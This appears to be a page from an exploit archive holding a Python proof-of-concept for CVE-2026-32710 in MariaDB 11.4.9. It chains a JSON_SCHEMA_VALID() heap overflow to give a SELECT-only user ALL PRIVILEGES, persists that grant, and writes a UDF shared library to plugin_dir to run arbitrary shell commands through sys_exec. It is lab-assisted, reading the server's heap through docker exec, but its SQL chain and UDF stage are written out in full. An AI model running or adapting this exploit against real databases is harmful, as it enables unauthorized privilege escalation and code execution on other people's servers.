5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-32710 — Heap OOB Write → Privilege Escalation → UDF RCE

Stage 1: Two-hop arbitrary write via JSON_SCHEMA_VALID() heap overflow.
         SELECT-only user → ALL PRIVILEGES WITH GRANT OPTION.
         Chain payload is pure SQL over TCP.

Stage 2: UDF code execution via DUMPFILE + CREATE FUNCTION.
         Writes pre-compiled .so to plugin_dir, executes arbitrary commands.

Target:  MariaDB 11.4.9 (Docker, ASLR disabled on host)

Lab-assisted: The script uses Docker/root introspection to read /proc/1/mem
and discover heap layout. The actual exploit chain is pure SQL over TCP.
A weaponized exploit would need an info-leak primitive to replace the
memory introspection step.

Usage:
    ./setup.sh                     # build and start the lab
    python3 exploit.py             # auto-calibrate and exploit
    python3 exploit.py --calibrate # measure constants only
    python3 exploit.py --cmd 'id > /tmp/pwned'  # custom command
"""
import argparse
import hashlib
import json
import socket
import struct
import subprocess
import sys
import time


CONTAINER = "mariadb-cve-2026-32710"
VAR_A = "a" * 40
VAR_B = "b" * 40
VAR_C = "c" * 40
EXHAUST_COUNT = 100
MA_STRUCT_OFFSET = 1712  # Security_context::master_access offset in struct


# =========================================================================== #
# Minimal MySQL/MariaDB protocol client (no external dependencies)            #
# =========================================================================== #

class MySQL:
    """COM_QUERY-only MySQL client over TCP."""

    def __init__(self, host, port, user, password, db=None, timeout=30):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.sock.settimeout(timeout)
        self._auth(user, password, db)

    def _recv(self, n):
        buf = bytearray()
        while len(buf) < n:
            c = self.sock.recv(n - len(buf))
            if not c:
                raise ConnectionError("server closed connection")
            buf += c
        return bytes(buf)

    def _rpkt(self):
        h = self._recv(4)
        plen = int.from_bytes(h[:3], "little")
        return h[3], self._recv(plen)

    def _wpkt(self, seq, data):
        self.sock.sendall(
            len(data).to_bytes(3, "little") + bytes([seq & 0xFF]) + data
        )

    def _auth(self, user, pw, db):
        _, g = self._rpkt()
        nul = g.index(0, 1)
        p = nul + 5
        salt1 = g[p : p + 8]
        p += 9 + 2 + 1 + 2 + 2 + 1 + 10
        salt2 = g[p : p + 12]
        salt = salt1 + salt2

        if pw:
            h1 = hashlib.sha1(pw.encode()).digest()
            h2 = hashlib.sha1(h1).digest()
            h3 = hashlib.sha1(salt + h2).digest()
            token = bytes(a ^ b for a, b in zip(h1, h3))
        else:
            token = b""

        caps = 0x000FA68D | (0x08 if db else 0)
        r = struct.pack("<II", caps, 1 << 24) + b"\x21" + b"\x00" * 23
        r += user.encode() + b"\x00" + bytes([len(token)]) + token
        if db:
            r += db.encode() + b"\x00"
        self._wpkt(1, r)
        _, reply = self._rpkt()
        if reply[0] == 0xFF:
            raise Exception(f"auth: {reply[9:].decode(errors='replace')}")

    def _lenenc(self, d, p):
        b = d[p]
        if b < 0xFB:
            return b, p + 1
        if b == 0xFC:
            return int.from_bytes(d[p + 1 : p + 3], "little"), p + 3
        if b == 0xFD:
            return int.from_bytes(d[p + 1 : p + 4], "little"), p + 4
        return int.from_bytes(d[p + 1 : p + 9], "little"), p + 9

    def query(self, sql):
        self._wpkt(0, b"\x03" + sql.encode("utf-8"))
        _, pkt = self._rpkt()
        if pkt[0] == 0xFF:
            return [f"ERR:{pkt[9:].decode(errors='replace')}"]
        if pkt[0] == 0x00:
            return ["OK"]
        ncols = pkt[0] if pkt[0] < 0xFB else 0
        for _ in range(ncols):
            self._rpkt()
        self._rpkt()
        rows = []
        while True:
            _, rp = self._rpkt()
            if rp[0] == 0xFE and len(rp) < 9:
                break
            if rp[0] == 0xFF:
                rows.append(f"ERR:{rp[9:].decode(errors='replace')}")
                break
            parts, pos = [], 0
            for _ in range(ncols):
                if rp[pos] == 0xFB:
                    parts.append("NULL")
                    pos += 1
                else:
                    sl, pos = self._lenenc(rp, pos)
                    parts.append(rp[pos : pos + sl].decode(errors="replace"))
                    pos += sl
            rows.append("\t".join(parts))
        return rows

    def alive(self):
        try:
            r = self.query("SELECT 1")
            return r and "1" in r[0]
        except Exception:
            return False

    def close(self):
        try:
            self._wpkt(0, b"\x01")
            self.sock.close()
        except Exception:
            pass


# =========================================================================== #
# Heap introspection (lab-assisted — requires docker exec as root)            #
# =========================================================================== #

SCANNER_TEMPLATE = r"""
import struct, json
mem = open("/proc/1/mem", "rb")
def rm(a, s):
    try:
        mem.seek(a); return mem.read(s)
    except: return None
ranges = []
with open("/proc/1/maps") as f:
    for l in f:
        if "rw-p" not in l: continue
        p = l.split(); a = p[0].split("-")
        s, e = int(a[0],16), int(a[1],16)
        if e-s > 4194304: continue
        if len(p) > 5 and p[5].strip(): continue
        ranges.append((s,e))
entries = {}
master_access = []
MA_OFF = %d
for s, e in ranges:
    d = rm(s, e-s)
    if not d: continue
    for off in range(0, len(d)-128, 8):
        nl = struct.unpack("<Q", d[off+24:off+32])[0]
        if nl != 40: continue
        ns = struct.unpack("<Q", d[off+16:off+24])[0]
        if not (0x7f0000000000 <= ns <= 0x7fffffffffff): continue
        nd = rm(ns, 41)
        if not nd: continue
        try: name = nd[:40].decode("ascii")
        except: continue
        ch = name[0]
        if ch not in "abc" or not all(c == ch for c in name): continue
        vp = struct.unpack("<Q", d[off+32:off+40])[0]
        vl = struct.unpack("<Q", d[off+40:off+48])[0]
        if not (0x7f0000000000 <= vp <= 0x7fffffffffff): continue
        if ch not in entries:
            entries[ch] = {"name": ch, "addr": s+off, "value_ptr": vp, "value_len": vl}
    off2 = 0
    while True:
        idx = d.find(b"lowpriv\x00", off2)
        if idx == -1: break
        sc = idx - 24
        if sc >= 0 and sc + MA_OFF + 8 <= len(d):
            u = struct.unpack("<Q", d[sc+8:sc+16])[0]
            if u and (0x7f0000000000 <= u <= 0x7fffffffffff):
                ud = rm(u, 8)
                if ud and ud[:7] == b"lowpriv":
                    ma = struct.unpack("<Q", d[sc+MA_OFF:sc+MA_OFF+8])[0]
                    master_access.append({"addr": s+sc+MA_OFF, "val": ma, "base": s+sc})
        off2 = idx + 1
mem.close()
print(json.dumps({"entries": entries, "ma": master_access}))
"""


def json_safe(b):
    return b not in (0x00, 0x22, 0x5C) and not (0x01 <= b <= 0x1F)


def scan_heap(container):
    """Scan mariadbd heap to find user_var_entry structs and master_access."""
    r = subprocess.run(
        ["docker", "exec", container, "python3", "-c",
         SCANNER_TEMPLATE % MA_STRUCT_OFFSET],
        capture_output=True, text=True, timeout=60,
    )
    if r.returncode != 0:
        return None, r.stderr[:200]
    try:
        data = json.loads(r.stdout)
    except json.JSONDecodeError:
        return None, r.stdout[:200]

    ents = data.get("entries", {})
    if not all(k in ents for k in "ac"):
        return None, f"missing entries (found: {list(ents.keys())})"
    if not data["ma"]:
        return None, "no master_access found"

    ea = ents["a"]
    ec = ents["c"]
    ma = data["ma"][0]

    a32 = ea["addr"] + 32
    lo = a32 & 0xFF
    hi = (a32 >> 8) & 0xFF

    if not json_safe(lo) or not json_safe(hi):
        return None, f"non-JSON-safe bytes (LO=0x{lo:02x} HI=0x{hi:02x})"

    if (ec["value_ptr"] >> 16) != (a32 >> 16):
        return None, "entry_c->value and entry_a+32 in different 64KB pages"

    return {
        "lo": lo, "hi": hi,
        "ma_addr": ma["addr"], "ma_val": ma["val"],
        "ea_addr": ea["addr"], "ea_value": ea["value_ptr"],
        "ec_addr": ec["addr"], "ec_value": ec["value_ptr"],
        "sc_base": ma["base"],
    }, None


def read_memory(container, addr, size):
    """Read raw bytes from mariadbd process memory."""
    r = subprocess.run(
        ["docker", "exec", container, "python3", "-c",
         f"m=open('/proc/1/mem','rb');m.seek({addr});print(m.read({size}).hex());m.close()"],
        capture_output=True, text=True, timeout=10,
    )
    if r.returncode == 0 and "Error" not in r.stdout:
        try:
            return bytes.fromhex(r.stdout.strip())
        except ValueError:
            pass
    return None


# =========================================================================== #
# Stage 1: Privilege escalation (SQL chain over TCP)                          #
# =========================================================================== #

def groom(db):
    """Exhaust tcache and place sentinel variables for adjacent allocation."""
    for i in range(EXHAUST_COUNT):
        db.query(f"SET @e{'x' * 38}{i:02d} = REPEAT('X', 127)")
    db.query(f"SET @{VAR_A} = REPEAT('X', 127)")
    db.query(f"SET @{VAR_B} = REPEAT('X', 127)")
    db.query(f"SET @{VAR_C} = REPEAT('X', 127)")
    db.query(f"SET @{VAR_A} = REPEAT('Z', 500)")


def build_chain_sql(lo, hi, ma_addr):
    """Build the single-statement two-hop chain SQL."""
    ma_bytes = struct.pack("<Q", ma_addr)

    overflow = (
        f"json_schema_valid('{{\"enum\":[0]}}', "
        f"CONCAT('\"', REPEAT(CHAR(0x41), 192), "
        f"CHAR({lo}), CHAR({hi}), '\"'))"
    )

    hop1_parts = [f"CHAR({b})" for b in ma_bytes]
    hop1_parts += [
        "CHAR(9)", "REPEAT(CHAR(0), 7)",       # length = 9
        "CHAR(3)", "REPEAT(CHAR(0), 7)",       # type = STRING_RESULT
        "CHAR(3)", "REPEAT(CHAR(0), 7)",       # decimals
        "REPEAT(CHAR(0), 64)",                 # padding
        "CHAR(0xA1)",                          # preserve next chunk size
        "REPEAT(CHAR(0), 29)",                 # remaining
    ]
    hop1 = f"CONCAT({', '.join(hop1_parts)})"
    hop2 = "REPEAT(CHAR(0xFF), 8)"

    return (
        f"SELECT {overflow}, "
        f"@{VAR_C} := {hop1}, "
        f"@{VAR_A} := {hop2}"
    )


def do_attempt(host, port, container, attempt_num):
    """Run one complete exploit attempt: connect → groom → scan → chain → persist."""
    for retry in range(10):
        try:
            db = MySQL(host, port, "lowpriv", "lowpriv", "test")
            break
        except (ConnectionError, ConnectionRefusedError, OSError):
            time.sleep(1)
    else:
        return None, "cannot connect after retries"

    r = db.query("SELECT * FROM mysql.global_priv LIMIT 1")
    if r and not r[0].startswith("ERR"):
        print("    Already privileged — skipping to stage 2")
        db.close()
        return True

    # Groom
    groom(db)

    # Scan (inline, for THIS connection's heap)
    scan, err = scan_heap(container)
    if not scan:
        db.close()
        return None, err

    lo, hi = scan["lo"], scan["hi"]
    ma_addr = scan["ma_addr"]

    print(f"    entry_a+32:    0x{scan['ea_addr'] + 32:016x}  (LO=0x{lo:02x} HI=0x{hi:02x})")
    print(f"    master_access: 0x{ma_addr:016x}  = 0x{scan['ma_val']:x}")

    # Read master_access before chain
    ma_before = read_memory(container, ma_addr, 8)
    if ma_before:
        print(f"    BEFORE: master_access = 0x{int.from_bytes(ma_before, 'little'):x}")

    # Build and fire chain
    chain = build_chain_sql(lo, hi, ma_addr)
    try:
        r = db.query(chain)
    except ConnectionError:
        db.close()
        return None, "connection lost during chain"

    if not r or any(x.startswith("ERR") for x in r):
        db.close()
        return None, f"chain error: {r}"

    if not db.alive():
        db.close()
        return None, "server crashed after chain"
    print(f"    Server alive after chain")

    # Read master_access after chain
    ma_after = read_memory(container, ma_addr, 8)
    if ma_after:
        val = int.from_bytes(ma_after, "little")
        print(f"    AFTER:  master_access = 0x{val:x}")
        if val != 0xFFFFFFFFFFFFFFFF:
            db.close()
            return None, f"master_access not set (0x{val:x})"
        print(f"    *** master_access = ALL PRIVILEGES ***")

    # Verify
    r = db.query("SELECT LOAD_FILE('/etc/hostname')")
    hostname = r[0].strip() if r and r[0] != "NULL" and not r[0].startswith("ERR") else None
    print(f"    LOAD_FILE(/etc/hostname): {hostname or 'N/A'}")

    r = db.query("SHOW GRANTS FOR CURRENT_USER()")
    for row in r:
        print(f"    {row}")

    r = db.query(
        "SELECT user, host, JSON_EXTRACT(Priv, '$.access') "
        "FROM mysql.global_priv LIMIT 5"
    )
    if r and not r[0].startswith("ERR"):
        print("    mysql.global_priv readable:")
        for row in r:
            print(f"      {row}")
    else:
        db.close()
        return None, "cannot read mysql.global_priv"

    # Persist
    print("[*] Persisting escalation...")
    db.query("GRANT ALL PRIVILEGES ON *.* TO 'lowpriv'@'%' WITH GRANT OPTION")
    db.query("FLUSH PRIVILEGES")

    print("[*] Sleeping 10s for Aria checkpoint...")
    try:
        db.query("SELECT SLEEP(10)")
    except ConnectionError:
        pass
    db.close()
    return True, "PERSISTENT PRIVESC"


def stage1(host, port, container, max_attempts=5):
    """Run privilege escalation with retries."""
    print("[*] Stage 1: Privilege Escalation")
    for i in range(max_attempts):
        print(f"\n  [Attempt {i + 1}/{max_attempts}]")
        result = do_attempt(host, port, container, i)
        if result is True:
            return True
        if isinstance(result, tuple):
            ok, msg = result
            if ok:
                print(f"    {msg}")
                return True
            print(f"    Failed: {msg}")
        else:
            print(f"    Failed: {result}")
        time.sleep(1)
    return False


# =========================================================================== #
# Stage 2: UDF RCE                                                           #
# =========================================================================== #

def stage2(host, port, container, command):
    """Write UDF .so → CREATE FUNCTION → execute command."""
    db = ensure_server(host, port, container, "Stage 2: UDF RCE")
    if not db:
        return False

    r = db.query("SHOW GRANTS FOR CURRENT_USER()")
    if not any("ALL PRIVILEGES" in row for row in r):
        print("    Privileges not persisted")
        db.close()
        return False
    print("    ALL PRIVILEGES confirmed")

    # Write UDF to plugin_dir
    print("[*] Installing UDF...")
    r = db.query(
        "SELECT LOAD_FILE('/tmp/raptor_udf.so') "
        "INTO DUMPFILE '/usr/lib/mysql/plugin/raptor.so'"
    )
    if r and r[0].startswith("ERR"):
        if "already exists" in r[0].lower():
            print("    raptor.so already in plugin_dir")
        else:
            print(f"    DUMPFILE: {r[0]}")
            db.close()
            return False
    else:
        print("    raptor.so written to plugin_dir")

    db.query("DROP FUNCTION IF EXISTS sys_exec")
    r = db.query("CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'raptor.so'")
    if r and r[0].startswith("ERR"):
        print(f"    CREATE FUNCTION: {r[0]}")
        db.close()
        return False
    print("    sys_exec() registered")

    # Execute
    print(f"[*] Executing: {command}")
    r = db.query(f"SELECT sys_exec('{command}')")
    print(f"    Return code: {r[0] if r else '?'}")

    if ">" in command:
        outfile = command.split(">")[-1].strip().rstrip("'\" ")
        r = db.query(f"SELECT LOAD_FILE('{outfile}')")
        if r and r[0] != "NULL" and not r[0].startswith("ERR"):
            print(f"    Output: {r[0].strip()}")

    db.close()
    return True


# =========================================================================== #
# Persistence verification                                                   #
# =========================================================================== #

def ensure_server(host, port, container, label=""):
    """Ensure MariaDB is reachable, restarting the container if needed."""
    if label:
        print(f"\n[*] {label}")
    for attempt in range(3):
        try:
            db = MySQL(host, port, "lowpriv", "lowpriv", "test", timeout=5)
            return db
        except Exception:
            pass
        print("    Server unreachable — restarting container...")
        subprocess.run(
            ["docker", "restart", container], capture_output=True, timeout=30
        )
        time.sleep(5)
    return None


def verify_persistence(host, port, container):
    """Verify ALL PRIVILEGES survived server restart."""
    db = ensure_server(host, port, container, "Persistence check...")
    if not db:
        print("    Server unreachable after restart")
        return False

    r = db.query("SHOW GRANTS FOR CURRENT_USER()")
    for row in r:
        print(f"    {row}")

    ok = any("ALL PRIVILEGES" in row for row in r)
    if ok:
        r = db.query("SELECT LOAD_FILE('/etc/hostname')")
        if r and r[0] != "NULL":
            print(f"    LOAD_FILE: {r[0].strip()}")

    db.close()
    return ok


# =========================================================================== #
# Calibration mode                                                           #
# =========================================================================== #

def calibrate(host, port, container):
    """Connect, groom, scan, and print measured constants."""
    print("[*] Calibrating...")
    db = MySQL(host, port, "lowpriv", "lowpriv", "test")
    groom(db)
    scan, err = scan_heap(container)
    db.close()

    if not scan:
        print(f"    Failed: {err}")
        return False

    a32 = scan["ea_addr"] + 32
    offset = scan["ea_value"] - scan["ma_addr"]
    print(f"\n    entry_a:        0x{scan['ea_addr']:016x}  value=0x{scan['ea_value']:016x}")
    print(f"    entry_a+32:     0x{a32:016x}  (LO=0x{scan['lo']:02x} HI=0x{scan['hi']:02x})")
    print(f"    entry_c:        0x{scan['ec_addr']:016x}  value=0x{scan['ec_value']:016x}")
    print(f"    master_access:  0x{scan['ma_addr']:016x}  = 0x{scan['ma_val']:x}")
    print(f"    SC base:        0x{scan['sc_base']:016x}")
    print(f"    OFFSET:         0x{offset:x} ({offset})")
    return True


# =========================================================================== #
# Main                                                                        #
# =========================================================================== #

def main():
    ap = argparse.ArgumentParser(
        description="CVE-2026-32710: MariaDB JSON_SCHEMA_VALID() heap OOB → RCE"
    )
    ap.add_argument("--host", default="127.0.0.1")
    ap.add_argument("--port", type=int, default=3306)
    ap.add_argument("--container", default=CONTAINER)
    ap.add_argument("--calibrate", action="store_true",
                     help="Measure heap layout constants and exit")
    ap.add_argument("--cmd", default="id > /tmp/pwned",
                     help="Command to execute via sys_exec()")
    ap.add_argument("--attempts", type=int, default=5,
                     help="Max stage 1 attempts")
    ap.add_argument("--stage1-only", action="store_true",
                     help="Skip UDF RCE (stage 2)")
    args = ap.parse_args()

    print("=" * 70)
    print("CVE-2026-32710 — Heap OOB → Privilege Escalation → UDF RCE")
    print(f"  Target:  {args.host}:{args.port} (MariaDB 11.4.9)")
    print(f"  Impact:  lowpriv (SELECT only) → ALL PRIVILEGES → RCE")
    print(f"  Method:  Lab-assisted (uses /proc/1/mem for heap introspection)")
    print("=" * 70)

    if args.calibrate:
        calibrate(args.host, args.port, args.container)
        sys.exit(0)

    if not stage1(args.host, args.port, args.container, args.attempts):
        print("\n[!] Stage 1 FAILED")
        sys.exit(1)
    print("\n[+] Stage 1: PRIVILEGE ESCALATION SUCCESSFUL")

    if args.stage1_only:
        verify_persistence(args.host, args.port, args.container)
        sys.exit(0)

    if not stage2(args.host, args.port, args.container, args.cmd):
        print("\n[!] Stage 2 FAILED")
        verify_persistence(args.host, args.port, args.container)
        sys.exit(1)

    print(f"\n[+] Stage 2: COMMAND EXECUTED")
    print(f"    Verify: docker exec {args.container} cat /tmp/pwned")
    sys.exit(0)


if __name__ == "__main__":
    main()